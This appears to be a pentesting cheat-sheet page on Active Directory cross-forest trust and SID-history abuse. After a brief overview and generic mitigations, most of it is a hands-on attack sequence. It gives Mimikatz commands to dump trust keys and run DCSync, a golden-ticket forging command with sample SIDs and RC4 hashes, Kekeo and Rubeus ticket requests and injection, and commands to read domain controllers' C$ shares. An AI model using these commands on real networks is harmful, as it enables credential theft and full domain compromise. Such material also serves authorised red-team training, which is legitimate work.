🟢SID Abuse

Cross-domain attacks involving forest root and SID (Security Identifier) abuse exploit vulnerabilities in trust relationships between different Active Directory forest domains.

These attacks manipulate the trust keys and SIDs to forge authentication tokens, allowing unauthorized access to resources across domains.

By abusing SID and trust relationships, attackers can potentially gain access to sensitive information, escalate privileges, and compromise the security of interconnected systems.

This technique underscores the importance of robust security measures and vigilant monitoring of inter-forest trust relationships to protect against such sophisticated threats.

Cross-Domain Attacks: Forest Root and SID Abuse

Cross-domain attacks targeting the forest root and SID (Security Identifier) exploit vulnerabilities present in the trust relationships between different Active Directory forest domains. These vulnerabilities are manipulated by attackers to forge authentication tokens, granting unauthorized access across domains.

Key Steps in the Attack

Dump Trust Keys: Extract the trust keys of inter-forest trusts to identify the SID of the current domain, SID of the target domain, and the rc4_hmac_nt (Trust Key) of the target domain (e.g., ecorp$).
Forge TGT: Utilize the extracted information to forge an inter-forest Ticket Granting Ticket (TGT) with the correct target and RC4 parameters.
Request TGS: With the forged TGT, request a Ticket Granting Service (TGS) ticket using asktgs.exe.
Inject TGS into Memory: Inject the obtained TGS into memory to bypass authentication mechanisms.
Access Resources: Gain access to all shared files and admin domain controllers (DCs) within the target domain.

Risks and Implications

Access to sensitive information
Privilege escalation
Compromised security of interconnected systems

Mitigation Strategies

Implement robust security measures
Monitor inter-forest trust relationships vigilantly
Regularly review and update trust keys and SIDs

Understanding and protecting against such sophisticated threats is crucial for the security of interconnected systems and to prevent unauthorized access to sensitive information.

Practice

Invoke-Mimikatz

1. We require the trust key of inter-forest trust

Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\techcorp$"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

2. Forge the inter-forest TGT

Invoke-Mimikatz -Command '"kerberos::golden /domain:us.techcorp.local /sid:S-1-5-21-210670787- 2521448726-163245708 /sids:S-1-5-21-2781415573- 3701854478-2406986946-519 /rc4:b59ef5860ce0aa12429f4f61c8e51979 /user:Administrator /service:krbtgt /target:techcorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi"'

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:eu.local /sid:S-1-5-21-3657428294-2017276338-1274645009 /rc4:799a0ae7e6ce96369aa7f1e9da25175a /service:krbtgt /target:euvendor.local /sids:S-1-5-21-4066061358-3942393892-617142613-519 /ticket:C:\AD\Tools\kekeo_old\sharedwitheu.kirbi"'

3. Request a TGS

Get a TGS for a service (CIFS below) in the target domain by using the forged trust ticket with Kekeo

# keko
tgs::ask /tgt:C:\AD\Tools\trust_tkt.kirbi /service:CIFS/techcorp-dc.techcorp.local
# Or using older version of Kekeo
.\asktgs.exe C:\AD\Tools\trust_tkt.kirbi CIFS/techcorp-dc.techcorp.local

4. Inject and use the TGS

Use the TGS to access the targeted service (may need to use it twice)

misc::convert lsa [email protected][email protected] 
# Or
.\kirbikator.exe lsa .\CIFS.techcorp-dc.techcorp.local.kirbi
ls \\techcorp-dc.techcorp.local\c$

Rubeus

1. Create ticket and add it into the memory using asktgs

# Rubeus
.\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/techcorp-dc.techcorp.local /dc:techcorp-dc.techcorp.local /ptt

C:\Users\Public\Rubeus.exe asktgs /ticket:C:\Users\Public\sharedwitheu.kirbi /service:CIFS/euvendor-dc.euvendor.local /dc:euvendor-dc.euvendor.local /ptt

# can access the shares now
ls \\techcorp-dc.techcorp.local\c$
ls \\euvendor-dc.euvendor.local\c$

PowerShell

1. Access the euvendor-net machine using PSRemoting

# cmdlet
Invoke-Command -ScriptBlock{whoami} -ComputerName euvendor�net.euvendor.local -Authentication NegotiateWithImplicitCredential

Extras

To use the DCSync feature for getting krbtg hash execute the below command with DC privileges

Invoke-Mimikatz -Command '"lsadump::dcsyn /domain:garrison.castle.local /all /cvs"'

Get the ForeignSecurityPrincipal

#These SIDs can access to the target domain
Get-DomainObject -Domain targetDomain.local | ? {$_.objectclass -match "foreignSecurityPrincipal"}

#With the by default SIDs, we find S-1-5-21-493355955-4215530352-779396340-1104
#We search it in our current domain
Get-DomainObject |? {$_.objectsid -match "S-1-5-21-493355955-4215530352-779396340-1104"}

PreviousKerberoast NextAbusingPAM Trust

Last updated 1 year ago

hashtagCross-Domain Attacks: Forest Root and SID Abuse

hashtagKey Steps in the Attack

hashtagRisks and Implications

hashtagMitigation Strategies

hashtagPractice

hashtagInvoke-Mimikatz

hashtag1. We require the trust key of inter-forest trust

hashtag2. Forge the inter-forest TGT

hashtag3. Request a TGS

hashtag4. Inject and use the TGS

hashtagRubeus

hashtag1. Create ticket and add it into the memory using asktgs

hashtagPowerShell

hashtag1. Access the euvendor-net machine using PSRemoting

hashtagExtras

hashtagTo use the DCSync feature for getting krbtg hash execute the below command with DC privileges

hashtagGet the ForeignSecurityPrincipal